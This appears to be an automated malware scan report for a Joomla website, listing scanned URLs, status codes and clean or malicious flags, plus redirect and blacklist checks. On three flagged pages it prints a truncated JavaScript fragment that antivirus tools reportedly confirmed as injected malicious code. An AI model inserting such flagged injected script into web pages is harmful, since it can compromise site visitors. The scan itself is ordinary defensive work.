Scanned pages/files
Request | Server response | Status |
http://wheelships.ru/ | 200 OK Content-Length: 43901 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l qf(mv); Antivirus reports:
| ||
http://wheelships.ru/media/system/js/caption.js | 200 OK Content-Length: 1721 Content-Type: application/x-javascript | clean |
http://wheelships.ru/templates/KBVKS/script.js | 200 OK Content-Length: 8365 Content-Type: application/x-javascript | clean |
http://wheelships.ru/index.php/joomla-overview | 200 OK Content-Length: 10781 Content-Type: text/html | clean |
http://wheelships.ru/index.php/joomla-license | 200 OK Content-Length: 40131 Content-Type: text/html | clean |
http://wheelships.ru/index.php/2009-02-08-13-08-47 | 200 OK Content-Length: 16092 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l qf(mv); Antivirus reports:
| ||
http://wheelships.ru/index.php/2009-02-08-13-08-47/2009-02-10-19-04-26 | 200 OK Content-Length: 19701 Content-Type: text/html | clean |
http://wheelships.ru/index.php/2009-02-08-13-08-47/2009-02-10-18-52-50 | 200 OK Content-Length: 22282 Content-Type: text/html | clean |
http://wheelships.ru/index.php/2009-09-17-05-31-13 | 200 OK Content-Length: 30460 Content-Type: text/html | clean |
http://wheelships.ru/index.php/sura | 200 OK Content-Length: 11695 Content-Type: text/html | clean |
http://wheelships.ru/index.php/sura/spusk | 200 OK Content-Length: 15945 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(l qf(mv); Antivirus reports:
| ||
http://wheelships.ru/index.php/sura/visitholland | 200 OK Content-Length: 12869 Content-Type: text/html | clean |
http://wheelships.ru/index.php/2009-02-08-11-32-44 | 200 OK Content-Length: 12112 Content-Type: text/html | clean |
http://wheelships.ru/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: application/x-javascript | clean |
http://wheelships.ru/test404page.js | 404 Not Found Content-Length: 291 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wheelships.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 13 Jun 2014 01:12:06 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 13 Jun 2014 01:12:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dtFzFVOtxzWj=OIbxMXePqaNp; expires=Sat, 14-Jun-2014 09:39:00 GMT
Set-Cookie: 80c96020a6edb5c4c7cfd908646a0fdc=rcv56pp5amp8u15f1s57cq85k3; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: wheelships.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 13 Jun 2014 01:12:06 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 13 Jun 2014 01:12:06 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: dtFzFVOtxzWj=OIbxMXePqaNp; expires=Sat, 14-Jun-2014 09:39:00 GMT
Set-Cookie: 80c96020a6edb5c4c7cfd908646a0fdc=rcv56pp5amp8u15f1s57cq85k3; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: wheelships.ru
Referer: http://www.google.com/search?q=wheelships.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wheelships.ru
Referer: http://www.google.com/search?q=wheelships.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wheelships.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wheelships.ru/
Result: wheelships.ru is not infected or malware details are not published yet.
Result: wheelships.ru is not infected or malware details are not published yet.